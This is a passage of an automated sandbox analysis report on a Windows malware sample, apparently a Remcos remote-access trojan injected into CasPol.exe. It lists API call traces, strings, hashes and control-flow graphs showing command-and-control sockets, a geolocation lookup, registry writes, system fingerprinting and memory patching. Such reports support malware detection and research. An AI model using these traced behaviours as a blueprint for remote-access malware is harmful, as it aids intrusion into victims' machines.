                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                  • API String ID: 994465650-2151626615
                                                                                                                  • Opcode ID: 8c905b45f271754ebccbf66324b392c02f54ace195c47071f909cd673dbb9e9f
                                                                                                                  • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                                  • Opcode Fuzzy Hash: 8c905b45f271754ebccbf66324b392c02f54ace195c47071f909cd673dbb9e9f
                                                                                                                  • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                  • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3658366068-0
                                                                                                                  • Opcode ID: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                  • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                                  • Opcode Fuzzy Hash: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                  • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1378 40c89e-40c8c3 call 401e52 1381 40c8c9 1378->1381 1382 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cc37 call 402860 * 2 call 401e13 * 5 1378->1382 1383 40c8d0-40c8d5 1381->1383 1384 40c9c2-40c9c7 1381->1384 1385 40c905-40c90a 1381->1385 1386 40c9d8 1381->1386 1387 40c9c9-40c9ce call 43ac1f 1381->1387 1388 40c8da-40c8e8 call 41a75b call 401e18 1381->1388 1389 40c8fb-40c900 1381->1389 1390 40c9bb-40c9c0 1381->1390 1391 40c90f-40c916 call 41b16b 1381->1391 1394 40c9dd-40c9e2 call 43ac1f 1383->1394 1384->1394 1385->1394 1386->1394 1398 40c9d3-40c9d6 1387->1398 1410 40c8ed 1388->1410 1389->1394 1390->1394 1407 40c918-40c968 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1391->1407 1408 40c96a-40c9b6 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1391->1408 1403 40c9e3-40c9e8 call 4082d7 1394->1403 1398->1386 1398->1403 1403->1382 1416 40c8f1-40c8f6 call 401e13 1407->1416 1408->1410 1410->1416 1416->1382
                                                                                                                  APIs
                                                                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LongNamePath
                                                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                  • API String ID: 82841172-425784914
                                                                                                                  • Opcode ID: 8bb05b44eb04f1e0dc5581eb888e05d16a888ad6e7e27c2a6ee5d7172b9019e7
                                                                                                                  • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                                                                                  • Opcode Fuzzy Hash: 8bb05b44eb04f1e0dc5581eb888e05d16a888ad6e7e27c2a6ee5d7172b9019e7
                                                                                                                  • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                    • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                  • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                  • API String ID: 782494840-3211212173
                                                                                                                  • Opcode ID: 3c0299fe29c24bb7778f62d6aaca1a6ea748efcef7158b6df084458578b8116c
                                                                                                                  • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                                                                                  • Opcode Fuzzy Hash: 3c0299fe29c24bb7778f62d6aaca1a6ea748efcef7158b6df084458578b8116c
                                                                                                                  • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1547 41a52b-41a56a call 401faa call 43a89c InternetOpenW InternetOpenUrlW 1552 41a56c-41a58d InternetReadFile 1547->1552 1553 41a5b3-41a5b6 1552->1553 1554 41a58f-41a5af call 401f86 call 402f08 call 401eea 1552->1554 1555 41a5b8-41a5ba 1553->1555 1556 41a5bc-41a5c9 InternetCloseHandle * 2 call 43a897 1553->1556 1554->1553 1555->1552 1555->1556 1560 41a5ce-41a5d8 1556->1560
                                                                                                                  APIs
                                                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                                                                                  Strings
                                                                                                                  • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                                                  • API String ID: 3121278467-91888290
                                                                                                                  • Opcode ID: 77afb7aa6b705f4675ab5a767cf1234564151b956219bab6c9cba43669e19d49
                                                                                                                  • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                                                                                  • Opcode Fuzzy Hash: 77afb7aa6b705f4675ab5a767cf1234564151b956219bab6c9cba43669e19d49
                                                                                                                  • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1565 1000c7e6-1000c7ed GetModuleHandleA 1566 1000c82d 1565->1566 1567 1000c7ef-1000c7fe call 1000c803 1565->1567 1568 1000c82f-1000c833 1566->1568 1577 1000c800-1000c80b GetProcAddress 1567->1577 1578 1000c865 1567->1578 1570 1000c872 call 1000c877 1568->1570 1571 1000c835-1000c83d GetModuleHandleA 1568->1571 1573 1000c83f-1000c847 1571->1573 1573->1573 1576 1000c849-1000c84c 1573->1576 1576->1568 1579 1000c84e-1000c850 1576->1579 1577->1566 1581 1000c80d-1000c81a VirtualProtect 1577->1581 1580 1000c866-1000c86e 1578->1580 1582 1000c852-1000c854 1579->1582 1583 1000c856-1000c85e 1579->1583 1589 1000c870 1580->1589 1585 1000c82c 1581->1585 1586 1000c81c-1000c82a VirtualProtect 1581->1586 1587 1000c85f-1000c860 GetProcAddress 1582->1587 1583->1587 1585->1566 1586->1585 1587->1578 1589->1576
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                    • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2099061454-0
                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                  • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                  • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1590 4126d2-4126e9 RegCreateKeyA 1591 412722 1590->1591 1592 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1590->1592 1593 412724-412730 call 401eea 1591->1593 1592->1593
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                  • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                  • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateValue
                                                                                                                  • String ID: HgF$pth_unenc
                                                                                                                  • API String ID: 1818849710-3662775637
                                                                                                                  • Opcode ID: 2f9e7c41ae4c253e06ea481f6c6fb5208ee03e4d5917cb70f9fd9782705e0590
                                                                                                                  • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                  • Opcode Fuzzy Hash: 2f9e7c41ae4c253e06ea481f6c6fb5208ee03e4d5917cb70f9fd9782705e0590
                                                                                                                  • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                    • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                    • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2099061454-0
                                                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                  • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                  • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2152742572-0
                                                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                  • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                  • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                  APIs
                                                                                                                  • send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • WaitForSingleObject.KERNEL32(000002CC,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                  • SetEvent.KERNEL32(000002CC,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: EventObjectSingleWaitsend
                                                                                                                  • String ID: LAL
                                                                                                                  • API String ID: 3963590051-3302426157
                                                                                                                  • Opcode ID: 601a9b8c2c127482c455f580d42fc3fb0a9ca8dc5f908a1857f109b89823151f
                                                                                                                  • Instruction ID: 8f6f307dcfa5e25975ae7096dc57d747427bb4b25c3784bf73346896dbb4b4c1
                                                                                                                  • Opcode Fuzzy Hash: 601a9b8c2c127482c455f580d42fc3fb0a9ca8dc5f908a1857f109b89823151f
                                                                                                                  • Instruction Fuzzy Hash: B82123B29001196BCF04ABA5DC96DEE777CBF54358B00413EF916B21E1EA78AA04D6A4
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                  • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateValue
                                                                                                                  • String ID: TUF
                                                                                                                  • API String ID: 1818849710-3431404234
                                                                                                                  • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                  • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                  • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                  • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                  APIs
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3360349984-0
                                                                                                                  • Opcode ID: e8ae3ea82ea2475e85ee6300a037f35bd35c636b734dcc91a3913795aa14f60e
                                                                                                                  • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                  • Opcode Fuzzy Hash: e8ae3ea82ea2475e85ee6300a037f35bd35c636b734dcc91a3913795aa14f60e
                                                                                                                  • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3919263394-0
                                                                                                                  • Opcode ID: e3fa97375f397a9adf851a325cc2d4fe92c4ff8b8f1d8781d8034c29ac5bd751
                                                                                                                  • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                                                                                  • Opcode Fuzzy Hash: e3fa97375f397a9adf851a325cc2d4fe92c4ff8b8f1d8781d8034c29ac5bd751
                                                                                                                  • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountEventTick
                                                                                                                  • String ID: >G
                                                                                                                  • API String ID: 180926312-1296849874
                                                                                                                  • Opcode ID: 5276d3f50751fa3cace36b7362d0e59a1d363df6b5e66a242b1f63c2d2d3302c
                                                                                                                  • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                                                                                                  • Opcode Fuzzy Hash: 5276d3f50751fa3cace36b7362d0e59a1d363df6b5e66a242b1f63c2d2d3302c
                                                                                                                  • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                                                                                                  APIs
                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                  • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                  • String ID: Rmc-B3IX49
